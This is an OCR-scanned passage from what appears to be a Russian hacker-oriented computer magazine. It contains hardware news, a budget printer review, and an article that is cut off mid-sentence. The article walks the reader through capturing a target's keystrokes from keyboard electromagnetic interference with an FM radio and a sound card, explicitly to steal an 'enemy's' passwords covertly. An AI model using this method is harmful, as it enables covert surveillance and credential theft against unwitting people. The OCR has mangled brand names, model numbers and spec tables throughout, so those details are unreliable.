ет желать лучшего. Если ты не хочешь, чтобы 
твой комп подвергался таким ударам, как от- 
ключение света или короткое замыкание, то 
присмотрись к новому ІІРЗ КВА1А.ЕВ серии М: 
ІІР-М500ѴА, ЕІР-М650ѴА и ЕІР-М1200ѴА. Разли- 
чаются они временем автономной работы. По 
словам производителя, первый выдержит 10 
минут, второй — 1 5, ну а старшая модель — все 
30(при подключении компас 17-дюймовым дис- 
плеем). Общими чертами этих ИБП являются 
обширный комплект поставки, порт 118В, свето- 
вые индикаторы, встроенный сетевой фильтр, 
защищающий от перепадов напряжения, и не- 
высокая цена ($120 за старшую модель). 
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Солнце для видеоплаты 

Летняя жара не должна стать причиной пере- 
грева твоей видеоплаты — именно так считает 
компания 2аІтап, выпустившая новый кулер 
для графических плат ѴЕ-900Си. Это устройс- 
тво весит 185 г и состоит полностью из меди. 
Кроме того, в нем применены тепловые трубки. 
Максимальная скорость вращения вентилято- 
ра (на двух подшипниках качения) составляет 
2400 оборотов в минуту, а шум от него не превы- 
шает 25 дБ. Установив этот кулер на радиатор 
графической платы, можно получить охлажде- 
ние не только видеопроцессора и памяти, но и 
всех остальных компонентов адаптера, напри- 
мер, конденсаторов. В комплект поставки уст- 
ройства входит регулятор скорости вращения, 
с помощью которого можно добиться нужного 
соотношения шума и эффективности. Стоит 
добавить, что кулер обладает режимом Зііепі 
Мобе, при котором он работает абсолютно бес- 
шумно. Стоимость устройства составляет $55. 
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МЕОАІМЕѴѴЗ 




НАСТОЯЩИЙ 
КОМПЬЮТЕРНЫЙ стол 



Компьютерный стол Роѵѵегсіезк, по сути, является системным блоком! 
В его столешницу встроены все компоненты, необходимые для работы: 
ОѴО-привод, ІІЗВ-порты и так далее. И никаких проводов! Стоит отме- 
тить, что столешница не простая. Она выполнена из материала ОиРопі 
Согіап, который надежно защитит компоненты ПКот влаги, пыли и прочих 
мерзостей этого жестокого мира. Никаких ограничений на модерниза- 
цию оборудования нет — она пройдет столь же просто, как и апгрэйд 
обычного компа. Стоитдобавить, что стол регулируется по высоте. Также 
на выбор предлагается масса цветовых решений, а на столешницу пре- 
доставляется десятилетняя гарантия. 



Знакомьтесь, Ріппасіе ТѴ! 

Из всего оборудования, выпускаемого Ріппасіе, кажется, можно собрать собственную телестудию или 
видеомонтажную. Сегодня у нас опять новинки, причем очень интересные: ТВ-тюнеры на шине РСІ- 
Ехргезз хі, слоты которой есть в каждой уважающей себя системной плате, а вот устройств 
для них пока что было немного. Модель Ріппасіе Зузіетз РСТѴ ОиаІ НуЬгісІ Рго РСІ-е имеет два 
коннектора для подключения антенн, порт З-Ѵібео и порт для ІР-приемника. Поддерживаются 
аналоговое и цифровое теле- и радиовещание, режим РІР (картинка в картинке), атакже запись 
одного канала при одновременном просмотре другого. Более совершенная модель Ріппасіе Зузіетз 
РСТѴ ОиаІ НуЬгісІ ОиаІ ОѴВ-3 Рго РСІ-е отличается поддержкой двух антенн ОѴВ-3. В устройствах исполь- 
зуются такие чипы, как Рйііірз ЗАА7 1 62 (базовый), РИіІірз ТОА 8275А (аналоговое и цифровое ТВ) и 2агІіпк 
2І_ 1 031 3 (спутниковые программы). Т акже у обоих в комплекте есть удобное ПО и пульт ДУ. 



И НИЧЕГО 



ЛИШНЕГО! 







^ Гегшт 



Печатные машинки 



БЮДЖЕТНЫЕ ПРИНТЕРЫ ДЛЯ ДОМА 



ТЕ5Т_І_АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ ОБОРУДОВАНИЕ 
РОССИЙСКИМ ПРЕДСТАВИТЕЛЬСТВАМ КОМПАНИЙ НР, САІ\ІОІ\І, БЕХМАРК И ЕРЗОІМ. 



Список тестируемого 
оборудования: 

Еехтагк2735 
Бехтагк Р915 
Сапоп Ріхта ІР1600 
Сапоп Ріхта ІР2200 
Сапоп Ріхта ІР4200 
Ерзоп С48 
Ерзоп С67 

Ерзоп Зіуіиз С67 РИоІо ЕсІШоп 
НРОезкіѳ13940 
НРОезкіѳ15443 
НРОѳзкіѳ15943 



Закончилась сессия, а с ней и многие вещи, 
которые требовали вмешательства принтера: 
печать курсовых, рефератов, докладов и про- 
чих составляющих насыщенной студенческой 
жизни. Вроде бы, печатающие головки могут на 
какое-то время расстаться с чернилами, а ка- 
ретка, уставшая бегать туда-сюда, тоже имеет 
право на передышку. Но не тут-то было! Скоро 
осень, которая принесет с собой пересдачу 
«хвостов», впереди новый семестр, требую- 
щий «аккуратного оформления работ» и так 
далее. Но и летом, в неучебную пору, принтеру 
может найтись работенка: распечатать какой- 
нибудь документ, схему, слайд или диаграмму, 
но чаще — фотки с последней попойки. 



Хочется иметь устройство, которое бы круглый 
год радовало хорошим качеством отпечатков. 
Сегодня мы протестировали доступные универ- 
сальные принтеры, которые подходят для всех 
типичных домашних задач, возникающих обыч- 
но у школьников, студентов и их родителей. Эти 
устройства качественные, надежные, недоро- 
гие, пригодны даже для печати фотографий. 
Методика тестирования 
Вначале на каждом принтере выводилась его 
собственная тестовая страница. Для проверки 
базовых функций печати нами использовалась 
специальная тестовая страница, состоящая из 
наиболее часто встречающихся элементов: 
текста (разного размера, толщины и наклона), 
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ПЕЧАТНЫЕ МАШИНКИ 



ЛШя.-. 




© 



І_ехтагк 2735 



юоо 



Максимальное 



разрешение, фі: 



Максимальная скорость 



цветной печати, стрхмин: 



Максимальная скорость 



монохромной печати, 



стрхмин: 



Емкость лотка для бумаги, шт: 



Дополнительно: 



| ПО для 
работы с изображениями 
в комплекте поставки 
Интерфейс: 115В 

_! 157x377x224 

В 2,3 



100 



Габариты, мм: 
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14800x1200 

і 

1 15 



Максимальное 



разрешение, фі: 



Максимальная скорость 



цветной печати, стрхмин: 



Максимальная скорость 



монохромной печати, 



стрхмин: 



Емкость лотка для бумаги, шт: 



Цополнительно: 



100 



Очень простое и компактное уст- 
ройство, которое не займет много 
места на столе и хорошо справит- 
ся с несложными домашними зада- 
чами. Сам по себе принтер очень 
прост — на нем имеются всего две 
кнопки управления: включение 

питания и выдача бумаги. Кстати, 
ею в процессе тестирования поль- 
зоваться не приходилось: бумага 
подавалась ровно и не мялась на 
выходе. С принтером поставляется 
удобное и несложное фирменное 
ПО, предназначенное для работы с 
изображениями. Тестовая страни- 
ца распечаталась довольно быст- 
ро (43 с). Фотография получилась 
наудивление качественной. 

Хотя и печаталась долго (2,5 мин.). 
«На удивление» — потому что этот 
принтер не поддерживает фотопе- 
чать и во всех задачах обходится 
одним картриджем. В общем, это 
удобно. Как уже говорилось выше, 
тестовая страница распечаталась 
быстро, но это оказалось единс- 
твенным достоинством, которое 
принтер показал в данном испыта- 
нии. Картинкананейбылаблеклой, 
текст был не черного, а какого-то 
болотно-зеленого цвета. Четкость 
— ниже средней. 



| поддержка 
интерфейса РісіВгібде, ЖК-экран, 
автономная печать с карт памяти 
форматов СотрасіРІазИ І/ІІ, 
Метогу Зііск, МыШ Месііа, Зесиге 
Эідііаі, ЗтагіМебіа, Місгобгіѵе, хЭ 
ІІІ5В 

д 150x428x237 

13,5 



Интерфейс: 



Габариты, мм: 



Более функциональная модель. 
Бехтагк Р915 оснащен фотокар- 
триджем, что существенно повы- 
шает его возможности и качество 
отпечатков. Крометого, работасфо- 
тографиями может осуществляться 
и автономно, без ПК — через интер- 
фейс РісіВгібде или с помощью карт 
памяти. Посредством встроенного 
ЖК-экрана можно легко управлять 
настройками устройства, а также 
просматривать и редактировать 
фотографии. Тут, несмотря на про- 
стоту и удобство меню, пригодится 
полная русификация принтера: от 
драйверов (которые, как и у преды- 
дущего устройства, дублируют голо- 
сом экранные сообщения) до надпи- 
сей на корпусе. Тестовая страница 
распечаталась четко и качественно, 
правда, не за рекордное время (1 
минута и 9 секунд). Работа над фото- 
графией заняла минуту и 20 секунд. 
Качество приемлемое, хотя задний 
план мог бы быть пропечатан четче, 
а цвета — понасыщеннее. При рабо- 
те наблюдался неприятный момент: 
довольно часто страницы и фото- 
графии печатались не полностью, 
наполовину или на треть. Решалась 
проблема сама собой: путем не- 
сколько раз повторенного задания 
на печать. Возможно, проблема ре- 
шится обновлением драйверов. 




;апоп 

1ХМАІР1600 



юооо 



Максимальное 



разрешение, фі: 



Максимальная скорость цветной 



печати, стрхмин: 



Максимальная скорость 



монохромной печати, 



стрхмин: 



Емкость лотка для бумаги, шт: 



Дополнительно: 



] 100 

| ПО для работы 
с изображениями в комплекте 
поставки 

ІІІ5В 

^35x249x165 

Р 2,9 



Интерфейс: 



Г абариты, мм: 



апоп 

ІХМА ІР2200 



юоо 



110 



14800x1200 

I 

117 



Максимальное 



разрешение, фі: 



Максимальная скорость 



цветной печати, стрхмин: 



Максимальная скорость 



монохромной печати, 



стр\мин: 



Емкость лотка для бумаги, шт: 



Дополнительно: 



Интерфейс: 



Габариты, мм: 



Еще один очень простой в освое- 
нии и обращении принтер. Имеет 
всего пару управляющих клавиш: 
для включения питания и выдачи 
застрявшего бумажного листа. Что 
очень понравилось в этой модели, 
так это скорость ее работы. Тесто- 
вая страница была распечатана за 
каких-то 25 секунд. Причем качест- 
во текста, таблицы и диаграммы не 
вызывает нареканий: все четкое и 
читабельное. В общем, для школь- 
ника-студента, который ищет при- 
емлемую по цене модель для рас- 
печатки рефератов — самое то. 
Авоткачество фотографий вобоих 
тестах оказалось низким. Натесто- 
вой странице цвета были не очень 
насыщенными. Фотография не вы- 
держивает вообще никакой крити- 
ки — по всей распечатке проходят 
широкие горизонтальные полосы. 
Хотя основное преимущество мо- 
дели сохранено и тут: печать фо- 
тографии отняла всего 45 секунд. 
Это даже меньше, чем указано на 
наклейке! 



д іоо 

I ПО для работы 
с изображениями в комплекте 
поставки 

В 115В 

^35x263x165 

12,9 

Более производительная модифи- 
кация предыдущей модели, обла- 
дающая к тому же более высоким 
качеством печати. Дизайн этих 
принтеров абсолютно идентичен, 
разве что Сапоп РІХМА ІР2200 чуть 
больше, хотя это и незаметно. На- 
бор прилагаемого программного 
обеспечения также одинаков, так 
как драйвера унифицированы 
вместе с утилитами. Зато основ- 
ной козырь ІР1600 тут сохранился 
и даже улучшился — скорость пе- 
чати очень высока. Тестовая стра- 
ница была выдана за 23 секунды, 
причем качество текста осталось 
столь же высоким, а качество 
картинки несколько выросло: она 
стала более четкой, насыщенной и 
естественной. Кардинально улуч- 
шился отпечаток на фотобумаге 
— теперь никаких полос нет и в 
помине. В общем, очень грамотно 
усовершенствованная базовая 
модель. 

К сожалению, все проблемы не ре- 
шены. И дело тут опять в картинках: 
по сравнению с отпечатками, сде- 
ланными другими моделями, ка- 
чество цветопередачи явно ниже. 
Поэтому мы рекомендуем обе эти 
модели тем, кто редко печатает 
фотки. 
















































» 



РЕПВІІМ 





оооо 




Ерзоп §ІуІиз 
С67 РГіоіо 
Есііііоп 



оо 




Ерзоп С87 

••• ••••ООО 



19600x2400 



10 



Максимальное 



разрешение, фі: 



Максимальная скорость 



цветной печати, стрхмин: 



Максимальная скорость 



монохромной печати, стрхмин: 



Емкость лотка для бумаги, шт: 



Дополнительно: 



ОігесіРгіпІ, 
РісіВгібде, печать на СО и 0\Ю 
ЦЗВ 

_ 41 9x299x1 60 
6,5 



Интерфейс: 



Габариты, мм: 



[2880x720 



Максимальное 



разрешение, фі: 



Максимальная скорость 



цветной печати, стрхмин: 



Максимальная скорость 



монохромной печати, стрхмин: 



12 



Максимальное 



разрешение, фі: 



Максимальная скорость 



цветной печати, стрхмин: 



Максимальная скорость 



монохромной печати, стрхмин: 



15760x1440 



10 



17 



Максимальное 



разрешение, фі: 



Максимальная скорость цветной 



печати, стрхмин: 



Максимальная скорость 



монохромной печати, стрхмин: 



15760x1440 



100 


Емкость лотка для бумаги, шт: 


100 


Емкость лотка для бумаги, шт: 


100 


Емкость лотка для бумаги, шт: 



Дополнительно: 



| ПО для работы 
с изображениями в комплекте 
поставки 

ІІІЗВ 

[419x203x167,4 



Интерфейс: 



Габариты, мм: 



Дополнительно: 



| ПО для работы 
с изображениями в комплекте 
поставки 

ІІІЗВ 

[447x240x195 



Интерфейс: 



Габариты, мм: 



Дополнительно: 



22 
120 

ПО для работы 
с изображениями в комплекте 
поставки 

ЦЗВ, ЕРР 
460x242x198 



Интерфейс: 



Габариты, мм: 





Довольно большое по размерам, 
но в то же время очень функцио- 
нальное устройство. Помимо того, 
чтоонобыстро и очень качественно 
распечатало нашу тестовую стра- 
ницу (23 с.) и фотографию (25 с.), в 
его активе есть возможность печа- 
ти на оптических носителях, а так- 
же прямая печать с камер и фото- 
аппаратов (интерфейс РісіВгібде). 
Не стоит также забывать и про два 
лотка подачи бумаги и встроенное 
устройство для автоматической 
двусторонней печати — теперь 
тебе не придется вручную перево- 
рачивать и перекладывать стра- 
нички. Компания Сапоп призывает 
использовать для печати только 
свои картриджи и бумагу — в этом 
случае, благодаря специальным 
технологиям, нас поразит качест- 
во отпечатков и долговечность их 
хранения. Как уже было сказано 
выше, качество отпечатков отлич- 
ное, никаких нареканий оно не 
вызывает. В общем, это хорошее и 
универсальное устройство. 

Цена немного выше, чем у осталь- 
ных устройств из обзора. Так же, 
каки габариты изделия. 



Ерзоп С87 подойдет обладателям 
как современных, так и довольно 
древних компов, так как оснащен 
параллельным портом, чего не ска- 
жешь о других моделях теста. Кро- 
ме того, в нем есть и современный 
порт ЦЗВ, так что с подключением 
проблем не будет. Тестовая стра- 
ница была распечатана без каких- 
либо проблем, с неплохим качес- 
твом. Время работы составило 63 
секунды. Распечатка фотографии 
заняла гораздо больше времени 
— 1 27 секунд, — но к качеству осо- 
бых претензий также нет — хоро- 
ший средний уровень. Кроме того, 
если использовать чернила и бума- 
гу Ерзоп, то нам обещают, что отпе- 
чатки не выцветут, не смажутся и не 
расплывутся. 

Габариты довольно велики, а ди- 
зайн устройства это только под- 
черкивает — такая серая громади- 
на может не вписаться в интерьер. 



Ерзоп Зіуіиз С48 прост в обраще- 
нии и имеет в комплекте поставки 
утилиты, облегчающие печать 
изображений. Хотя основной его 
талант — это распечаткатекстовых 
материалов. С тестовой страницей 
он справился на отлично, особен- 
но с таблицей и диаграммой — они 
получились яркие и четкие. С текс- 
том дело обстоит немного хуже, но 
в общем он довольно неплох. 
Только самый маленький шрифт 
несколько размыт. С фотографи- 
ями хуже: цвета передаются неес- 
тественно. При печати фотки за- 
метны горизонтальные полосы. Но 
происходит распечатка всего за 
48 секунд. Стоит обратить особое 
внимание на настройки качества 
печати: уровень «тест+графика» 
(при котором мы и работали) выда- 
ет неплохой результат, но занима- 
ет этот процесс 3 минуты 30 секунд 
— именно столько печаталась тес- 
товая страница. А на уровне качес- 
тва «текст» работать практически 
невозможно: буквы размытые и 
нечеткие, видны непропечатанные 
полосы. 



Более совершенная модель от 
компании Ерзоп, полностью оправ- 
дывающая свою приставку к на- 
званию — Р0о!о Есііііоп. Напечатав 
тестовую страницу за минуту и 55 
секунд, он воспроизвел находящу- 
юся на ней графическую инфор- 
мацию одним из лучших в обзоре 
— все цвета были естественными, 
насыщенными и яркими. С текстом 
тоже проблем не наблюдалось: 
четкий и совершенночитабельный, 
полное отсутствие артефактов. Но 
по-настоящему этот принтер про- 
явил себя, когда добрался до фо- 
тографии на специальной бумаге. 
Во-первых, он справился с задачей 
всего за 45 секунд. Во-вторых, за 
это время была напечатана очень 
качественная фотография, на ко- 
торой нам понравилась естествен- 
ность цветопередачи. 

К недостаткам обоих принтеров 
Ерзоп, помимо уже написанного 
выше, нужно отнести их дизайн и 
темную расцветку корпусов, что 
вкупе делает принтеры оптически 
более громоздкими. Понятно, что 
для дома это не самое лучшее. Т ак- 
же стоит отметить повышенную за- 
висимость качества изображения 
от настроек драйверов. Данная 
особенность была замечена толь- 
ко у этих принтеров. Для дома чем 
проще, тем лучше. 













































Максимальное 



Максимальное 



14800x1200 



разрешение, сірі: 



Максимальная скорость цветной 



печати, стрХмин: 



Максимальная скорость 



монохромной печати, стрХмин: 



Емкость лотка для бумаги, шт: 



Дополнительно: 



112 

1 80 

| ПО для работы 
с изображениями в комплекте 
поставки 

ІІІЗВ 

1470x197x244 

12 



Интерфейс: 



Габариты, мм: 



Компактный и стильный принтер 
от компании НР, который радует 
своей простотой, небольшими 
размерами и удачным дизайном. 
Он хорошо подойдет для выпол- 
нения несложных, типичных задач 
печати. С тестовой страницей он 
справился неплохо — по качест- 
ву претензий почти нет, скорость 
вполне приемлемая — 40 секунд. 
Фотография печаталась полторы 
минуты. Результат неплохой. Не- 
опытному пользователю понравит- 
ся минимализм в органах управле- 
ния — всего одна кнопка Роѵѵег, и 
все. Запутаться негде и не в чем. 
Эффект красных глаз на фото кор- 
ректируется автоматически. 
Единственная проблема — с качес- 
твом фотографий. Как на простой 
бумаге, так и на фото, снимки были 
несколько невнятными — где-то 
не очень хорошая цветопередача, 
где-то видна горизонтальная по- 
лоса. 



[разрешение, фі: 



[Максимальное 



[Максимальная скорость цветной 



[разрешение, фі: 



|печати, стрХмин 



[Максимальная скорость цветной 



[Максимальная скорость 



|печати, стрХмин: 



монохромной печати, стрХмин 



Емкость лотка для бумаги, шт: 



Дополнительно: 



|9 

100 



[интерфейс 
РісіВгіфе, ПО для работы с изоб- 
ражениями в комплекте поставки 
ІІІЗВ 

^59x220x169 

ВЗ, 6 



Интерфейс: 



Габариты, мм: 



[Максимальная скорость 



монохромной печати, стрХмин: 



Емкость лотка для бумаги, шт: 



Дополнительно: 



Интерфейс: 
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|РісІВгіфе 
ІІІЗВ 

1459x220x169 
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НР Оезк|е13940 НР ОезШеі 5943 НР ОезкЗеІ 5443 



ЮСЮО 



ІОО 



юоо 



ПЕЧАТНЫЕ МАШИНКИ 



4800x1200 



Старшая модель НР в нашем об- 
зоре. От предыдущей отличается 
исключительно в лучшую сторо- 
ну. Немного изменен дизайн и 
расцветка корпуса, в список воз- 
можностей добавлен интерфейс 
РІсІВгіфе, так что теперь фотки 
можно будет распечатывать без 
участия ПК. Как ни странно, но 
шум от печати стал еще меньше, 
нежели у предыдущей модели. В 
остальном же модели схожи. На 
правах старшего данный принтер 
выдал несколько более качествен- 
ную фотку и тестовую страницу — 
четкий текст и яркие естественные 
цвета присутствуют. 

Хотя сделан он это более медлен- 
но: тестовая страница отнялау него 
минуту и 1 1 секунд, а печать фотки 
заняла минуту. К сожалению, от 
недостатков — горизонтальных 
полос — этот принтер так и не смог 
избавиться. 



4800x1200 



НР Эезкіеі 5443 имеет увеличен- 
ную скорость печати (30 секунд на 
тестовую страницу и 80 на фото- 
графию), улучшенную цветопере- 
дачу (изображения выглядят более 
четкими и насыщенными, живыми). 
В наличии — интерфейс РісіВгіде 
для прямой печати с совместимых 
устройств. В комплект поставки 
входит все необходимое для рабо- 
ты, включая трехцветный картридж. 
Если к нему добавить фирменную 
бумагу, то нам обещают столетнюю 
сохранность фотографий. Так что 
сможешь порадовать детей и вну- 
ков своими снимками. 
Ксожалению, все нововведения не- 
сколько увеличили габариты и вес 
устройства. На некоторых фото- 
графиях проявлялись артефакты. 



Выводы 

После того как мы распечатали все, 
что только можно на этих устройс- 
твах, мы можем смело сказать, что их 
покупка себя оправдывает. Несмот- 
ря на скромную цену, они достойно 
справятся с типичными домашними 
задачами (правда, кто-то быстрее 
и качественнее, а кто-то, соответс- 
твенно, медленнее и похуже). Они 
даже напечатают неплохие фотки 
(но в этом случае не стоит рассчиты- 
вать на нечто сверхкачественное). 
«Выбором редакции» становится 
Сапоп Ріхта ІР4200 за свои богатые 
возможности и качество отпечатков. 
А «Лучшая покупка» достается НР 
0езк3е13940! ос 
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О Суть и методы идеи 

Вкратце объясню, о чем пойдет речь. Все токо- 
потребляющие устройства, будь то телевизор, 
мышь, клавиатура, жесткий диск или кулер, 
во время работы создают в окружающем про- 
странстве электромагнитное поле. Его воз- 
никновение, как известно из курса физики, на- 
прямую связано с током разного напряжения, 
проходящим по проводам и каналам печатных 
плат. Величину этих электромагнитных колеба- 
ний можно измерить специальными прибора- 
ми. Поле часто создает помехи в работе радио- 
приемников, телевизоров и другой техники. Ты, 
наверное, замечал, что поставленный вблизи 
телевизора РМ-радиоприемник начинает хуже 
принимать каналы, сигнал в прямом смысле 
слова «забивается» посторонним излучением. 
Этот факт натолкнул меня на неплохую мысль: 
если телевизор засоряет сигнал, который 
«слушает» радиоприемник, то неплохо бы про- 
верить, как это же сделает клавиатура. Ведь 
помехи, то есть электромагнитные импульсы, 
генерируемые ей, принадлежат, согласно 
справочникам, диапазону от 10 Гц и до 1000 
МГц, а этот диапазон и является основным ка- 



налом утечки информации из современных ПК. 
Для работы я вооружился следующими инстру- 
ментами: 

1 . Комп со звуковой картой. 

2. Дешевый китайский радиоприемник Гизип. 

3. Соединительный шнур для подключения ГМ- 
приемника к линейному входу звуковой карты. 

Что касается приемника, то он может быть лю- 
бым (лучше — с ручной подстройкой частоты, 
так как поиск нужных помех — тонкая работа), 
главное — не использовать внутренний ГМ-тю- 
нер, так как электромагнитные наводки внутри 
корпуса сведут на нет все попытки получить 
хоть какой-то результат. Шнур — стандартный, 
можно спаять самому из обрезков, оставшихся 
от старых сломанных наушников или микро- 
фонов. На первых порах лучше подключить к 
выходу звуковой карты наушники и проводить 
все операции в них — так будут лучше слышны 
все нюансы шума. С помощью «зпбѵоІ32.ехе» 
отрегулируй громкость записываемого сигнала 
по минимуму, предварительно выбрав в качес- 
тве источника записи линейный вход, иначе ты 



рискуешь оглохнуть, услышав дикий шум, вы- 
даваемый радиоприемником. Подсоедини при- 
емник к линейному входу и включи его питание. 
Вполне возможно, что вместо нужных нам шумов 
ты услышишь музыку, которую крутят на какой- 
нибудь ГМ-станции. В таком случае слегка пок- 
рути колесико регулировки частот, пока не услы- 
шишь «белый шум», каклюбят говорить физики. 
Далее твои действия должны выглядеть следу- 
ющим образом: зажми любую кнопку клавиа- 
туры и начинай очень осторожно подстраивать 
частоту, пока не услышишь характерный треск с 
частотой около 200 «трещаний» в минуту (или Зв 
секунду). Если ты отпустишь кнопку клавиатуры, 
то треск должен прекратиться. Это верный знак 
того, что ты нашел нужную частоту. В некоторых 
случаях искомый сигнал может выглядеть как 
непрерывное, довольно низкое гудение, пере- 
мешанное с шумом, изменяющее свой тон при 
нажатии на кнопки клавиатуры. Если результат 
не приходит, то, вероятно, ты держишь приемник 
слишком близко к монитору. Особенно сильные 
помехи дает ЭЛТ-монитор. Если ты не можешь 
найти нужную частоту — отрегулируй длину вне- 
шней антенны радиоприемника. 



СВЕЖИИ ПОДХОД К ПЕРЕХВАТУ НАБИРАЕМОГО 
НА КЛАВИАТУРЕ ТЕКСТА 



ТАКОЙ ЗЛОСТНЫЙ ХАКЕРЮГА, КАК ТЫ, КОНЕЧНО, НЕ РАЗ 
ОБЩАЛСЯ С ПРОГРАММНЫМИ КЕЙЛОГЕРАМИ. ЗАПУСТИЛ 
ОДИН РАЗ ЭТУ ПРОГРАММКУ У НЕПРИЯТЕЛЯ — И ГОТОВО: 
ВСЕ ЕГО ПАРОЛИ И НАБИ РАЕМЫЙ ТЕКСТ, МОЖНО СЧИ- 
ТАТЬ, УЖЕ У ТЕБЯ. ОДНАКО У ЭТОГО ПОДХОДА ЕСТЬ НЕДО- 
СТАТОК: НУЖНО КАКИМ-ТО ОБРАЗОМ ЗАПУСТИТЬ СОФТИ- 
НУ НА ЧУЖОМ КОМПЬЮТЕРЕ, ЧТО НЕ ВСЕГДА ВОЗМОЖНО. 
ПОЭТОМУ МЫ РЕШИЛИ СДЕЛАТЬ ЭЛЕМЕНТАРНЫЙ ДЕВАЙС, 
ПРИ ПОМОЩИ КОТОРОГО ТЫ СМОЖЕШЬ ЛЕГКО ЛОКИРО- 
ВАТЬ ВЕСЬ НАБИРАЕМЫЙ ТЕКСТ, ПРОСТО ПОДОЙДЯ БЛИЖЕ 
К КОМПУ НЕПРИЯТЕЛЯ. 
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О Анализируем данные 

Предположим, что ты нашел частоту, на кото- 
рой помехи, создаваемые клавиатурой, слыш- 
ны особенно хорошо. В таком случае ты сделал 
большую часть работы. Остается лишь запи- 
сать помехи от различных нажатых клавиш, 
используя любой продвинутый ѵѵаѵе-редактор, 
например ІЧего ѴѴаѵе Ебііог, и проанализиро- 
вать их. Различия в волновой структуре звуко- 
вой формы помех, создаваемых клавиатурой, 
помогут нам разглядеть в неразберихе белого 
шума скан-коды нажатых клавиш :). Открывай 
звуковой редактор и начинай запись сигнала, 
подающегося с линейного входа, набирая на 
клавиатуре несложное слово, состоящее из 
4-5 символов. Чтобы потом разглядеть на гра- 
фическом изображении звуковой волны места, 
где обычный шум перемешан с помехами — 
«треском» клавиатуры, — при записи сигнала 
лучше удерживать каждую клавишу подольше, 
хотя бы 0,5 секунд. Конечно, в реальной ситу- 
ации, когда ты будешь сканить чужую клавиа- 
туру, никто не будет специально для тебя долго 
жать на кнопки, но наша задача сейчас — ра- 
зобраться в методе, чтобы потом выполнять 
более сложное сканирование. 

Записав свое сообщение, внимательно пос- 
мотри на графическое изображение звуковой 
волны. На ней есть области относительного спо- 
койствия — в эти промежутки времени ни одна 
из клавиш клавиатуры не была нажата. Есть же 
области, которые состоят из сплошных «всплес- 
ков». На слух они воспринимаются как щелчки. 
Это промежутки времени, когда какая-либо кла- 
виша была нажата. В это время электрическая 
цепь была замкнута, и электромагнитные поме- 
хи исправно генерировались с определенной 
частотой. Выдели небольшой кусок диаграммы, 
содержащий клавиа- 
турные помехи, и от- 
масштабируй его до 
таких размеров, чтобы 
четко прослеживался 
каждый нюанс, каж- 
дое отдельное колеба- 



ние звуковой волны (в моем случае масштаб был 
равен 700%). В «ЫегоѴѴаѵеЕсІііог» -е масшта- 
бирование производится кручением колесика 
мыши (масштабирование — очень полезный 
инструмент, с его помощью ты всегда отличишь 
обычные помехи от нужных нам фрагментов, 
содержащих ценную информацию). Теперь об- 
рати внимание на то, что звуковая волна имеет 
некоторые фрагменты (я бы назвал их ключами), 
которые повторяются постоянно, причем с опре- 
деленной периодичностью (см. скриншоты). Эти 
повторяющиеся фрагменты придают нашей, ка- 
залось бы, случайной звуковой волне, характер 
периодической функции. Я насчитал по 2 фраг- 
мента-ключа для каждой клавиши. Самое инте- 
ресное заключается в том , что для каждой кнопки 
клавиатуры существуют свои фрагменты-ключи. 



«Но ведь мы можем узнать такие последователь- 
ности только для своей клавиатуры!» — в него- 
довании воскликнешь ты. Не беда! При наличии 
достаточно большого количества записанных 
«клавиатурных помех» можно провести часто- 
тный анализ (о нем можно прочесть в любой книж- 
ке по криптографии). Он основан на том факте, 
что каждая буква алфавита, равно как и знак пре- 
пинания, встречается в тексте с определенной 
вероятностью, например, в русском языке буква 
«о» встречается гораздо чаще, чем буква «щ». 
Для проведения частотного анализа нужно будет 
составить массив, содержащий все виды помех. 
Далее нужно написать программу — анализатор 
звуковогофайла,сравнивающуюсодержащиеся 
в нем помехи с помехами из массива. Программа 
должна записать условные имена в файл (напри- 
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мер, «ротехаі , ротехаб, ...»). Этот файл и будет 
материалом для частотного анализа. 

Обрати внимание на мой скриншот, который 
рассматривает волновую структуру для буквйі 
«а», и сравни его с соответствующей структу- 
рой для буквы «И». Букву «а» можно сразу же 
визуально отличить от других по характерному 
ѵѵ-образному фрагменту-всплеску. Действуя 
таким образом, ты вскоре научишься безо- 
шибочно определять, какой символ скрыва- 
ется за данной 
последова- 
тельностью 
всплесков. 



Антишум 

Здесь будут приведены краткие рекомен- 
дации для тех экспериментаторов, которые 
не желают оказаться глухими еще в юности 
:). Уверяю читателей, что все предустановки 
фильтров, встроенные даже в самые извест- 
ные аудиоредакторы (типа КІоісе Ребисііоп), не 
помогут нам отсеять помехи и оставить нужный 
сигнал. Он просто-напросто удаляется при 
фильтрации вместе с «мусором», потому что 
анализаторы фильтров воспринимаютнужные 
нам сигналы-всплески как «щелчки», то есть 
как дефекты аудиозаписи. Чтобы составить 
правильный фильтр, придется поработать го- 
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ловой. Путем долгого анализая выяснил , что на 
звуковых частотах выше 3700 Г ц содержится в 
основном один только свистящий шум. Выяс- 
нить это мне помог пункт меню ЫегоѴѴаѵеЕсІіІог- 
а «ЕпНапсетепі->РіІІег ТооІЬох» (я выделил 
звуковой фрагмент, содержащий полезный 
сигнал, заюзал вышеупомянутый инструмент 
и, установив флажок «ВапсІ Разз Ріііег», вы- 
брал следующие параметры: «Іоѵѵег»=3700 Нг, 
«ирре»=22050 Нг. Полезный сигнал почти пе- 
рестал слышаться, следовательно, вся звуко- 
вая информация, лежащая отзначения «Іоѵѵег» 
до «иррег» — мусор, а остальное — полезный 
сигнал). Итак, выделяй всю запись и приме- 
няй вышеуказанный фильтр с параметрами 
«Іоѵѵег»=0 и «иррег»=3700. При выполнении 
этой операции, конечно, теряется некоторая 
часть информации из области верхних частот. 
Есть возможность избежать таких потерь, на- 
строив эквалайзер («ТооІз->ЕдиаІІ 2 ег»), но на 
это понадобится чуть больше времени. Экспе- 
риментируй с фильтрами — и ты добьешься 
нужного результата. 

Причины использовать 
этот метод 

Преимущество метода заключается прежде 







> Судя по всплескам , слева — му- 
сор, справа — сигнал. 
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> Фрагменты-ключи для символа "а" 

всего в его относительной несложности и доступности лю- 
бому желающему. Для мобильного перехвата, то есть сле- 
жения за какой-либо интересующей тебя целью на чужой 
территории, может использоваться ноутбук с небольшим 
«довеском» — внешним радиоприемником. Для того чтобы 
обеспечить хороший результат, последний лучше заэкра- 
нировать или отнести его подальше от ноутбука, иначе ты 
можешь принять излучение от своего ноута за сигналы от 
клавиатуры-цели. Другое, более безопасное решение — за- 
пись радиосигнала нужной частоты на диктофон и последу- 
ющее его изъятие. 

Иные встречавшиеся мне методы изъятия ценной инфор- 
мации из электромагнитных помех, генерируемых клави- 
атурой, требуют, как минимум, анализатора спектра, ос- 
циллографа, частотомера, мультиметра и тому подобных 
приборов, что вряд ли подойдет даже для очень состоятель- 
ного гражданина. Плюс ко всему, пошарив в интернете, ты 
